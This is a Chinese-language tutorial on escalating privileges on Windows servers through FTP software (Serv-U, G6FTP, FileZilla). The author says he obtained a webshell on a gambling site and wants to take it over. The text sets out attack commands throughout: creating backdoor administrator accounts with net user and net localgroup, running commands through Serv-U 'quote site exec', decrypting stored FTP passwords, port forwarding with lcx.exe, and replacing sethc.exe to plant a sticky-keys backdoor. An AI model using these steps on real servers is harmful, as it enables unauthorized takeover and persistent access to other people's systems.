windows提權之ftp提權

摘要： windows提權之ftp提權 0，起因，由於前幾天拿了一個菠菜站的webshell，但是隻有iis許可權，執行無法建立使用者等操作，更無法對整個伺服器進行控制了，於是此時便需要提權了，對於一個剛剛入門的小白來說，此刻真正意識到了提權的重要性，於是便開始學習提取相關知識，以拿下該菠菜的站點...

windows提權之ftp提權

0，起因，由於前幾天拿了一個菠菜站的webshell，但是隻有iis許可權，執行無法建立使用者等操作，更無法對整個伺服器進行控制了，於是此時便需要提權了，對於一個剛剛入門的小白來說，此刻真正意識到了提權的重要性，於是便開始學習提取相關知識，以拿下該菠菜的站點。

提權前的準備工作

1，通常來說，不同的指令碼所處的許可權是不一樣的。這就意味著，如果該站點支援許可權更高的指令碼，我們可以上傳該許可權更高的指令碼的大馬，進而拿到更高的許可權。

• asp/php 通常為匿名許可權(網路服務許可權)
• aspx 通常為user許可權
• jsp 通常為系統許可權

2，提權中常常也需要進行資訊收集：

• 內外網
• 伺服器系統和版本位數
• 伺服器的補丁情況
• 伺服器的安裝軟體情況
• 伺服器的防護軟體情況
• 埠情況
• 所支援的指令碼情況
• ...............................等等

3，windows資訊收集中常用的命令：

ipconfig /all檢視當前ip
net user檢視當前伺服器賬號情況
netstat -ano檢視當前伺服器埠開放情況
ver檢視當前伺服器作業系統
systeminfo檢視當前伺服器配置資訊（補丁情況）
tasklist /svc檢視當前伺服器程序情況
taskkill -pid pid號結束某個pid號的程序
taskkill /im qq.exe /f 結束qq程序，如果對命令不清楚，可以使用taskkill /? 進行檢視
net user v01cano v01cano /add 新增一個使用者名稱為v01cano密碼為v01cano的使用者
net localgroup administrators v01cano /add 將使用者v01cano新增到管理員組
whoami檢視當前操作使用者（當前許可權）

4，FTP軟體提權：

常見的FTP軟體有server-u，g6ftp，filezilla。

server-u提權

• Server -u的預設埠為43958

server-u提權常用方法,一：

1，檢視預設安裝目錄下的ServUDaemon.ini檔案，進而檢視使用者名稱和密碼，將密碼去cmd5.com找到對應的server-u的解密方式進行解密。

2，登入ftp，執行如下命令，建立使用者，並且加入到管理員組。

quote site exec net user v01cano v01cano /add

quote site exec net localgroup administrators v01cano /add

server-u提權常用方法二：

1，使用大馬直接建立ftp賬號，使用ftp賬號登入ftp。

2，然後再執行如下命令，建立系統賬號。

quote site exec net user v01cano v01cano /add

quote site exec net localgroup administrators v01cano /add

server-u提權常用方法三：

server-u的管理員賬號許可權較大，相當於系統許可權，可以通過管理員賬號直接建立使用者，並且加入到管理員組。

g6ftp提權：

科普：g6ftp的預設埠為8021，只偵聽在127.0.0.1的8021埠上，所以無法從外部直接訪問，需要進行埠轉發。

1，查詢管理配置檔案Remote.ini，將administrator管理密碼解密。解密得到administrator的管理員密碼為123456

2，首先進行查詢該網站的可讀可寫目錄，然後上傳cmd.exe和lcx.exe到該目錄下。

3，檢視網站根目錄的許可權得知，此處網站的根目錄可讀可寫，直接上傳到網站跟目錄即可。上傳成功後，即可直接通過cmd.exe呼叫lcx.exe命令，檢視lcx.exe的用法。

然後通過如下命令轉發埠，將127.0.0.1的8021埠通過8427埠轉發出去：

4，轉發成功後，通過g6ftp軟體進行連線，以管理員使用者登入

連線成功：

5，建立使用者並設定許可權和執行批處理檔案

建立使用者：右鍵，選擇new user

選擇根目錄為c盤：

賦予全部許可權：

然後將批處理檔案adduser.bat上傳到目標站點中：

adduser.bat中的檔案內容為：即新建一個使用者名稱和密碼均為v01cano的使用者，並且加入到管理員組中。

net user v01cano v01cano /add
net localgroup administrators v01cano /add

然後在g6ftp軟體中加入批處理命令：

然後在控制檯登入ftp，並且執行所加入的批處理命令：命令成功執行：

在目標機上檢視，新建使用者成功，並且成功加入到了管理員組。

提權成功。

filezilla提權：

科普：filezilla預設埠為14147埠

1，找到預設安裝目錄下面有兩個敏感檔案filezillaserver.xml(包含了使用者資訊)和filezillaserver interface.xml(包含了管理資訊)，檢視使用者名稱和密碼：

2，進行埠轉發，方法類似g6ftp:

3，使用filezilla軟體進行遠端連線：

4，新建使用者並設定使用者的根目錄。

5，開啟filezilla客戶端軟體，使用剛剛新建的使用者名稱和密碼進行連線：

6，連線成功以後，替換c:/windows/system32/sethc.exe檔案。

7，直接遠端連線即可，win+r輸入mstsc即可開啟遠端桌面。輸入靶機ip進行連線：不需要輸入使用者名稱和密碼，直接連續按下5次shift鍵，即可以管理員的身份開啟cmd，然後建立使用者，或者直接輸入explorer.exe，進入靶機。遠控成功。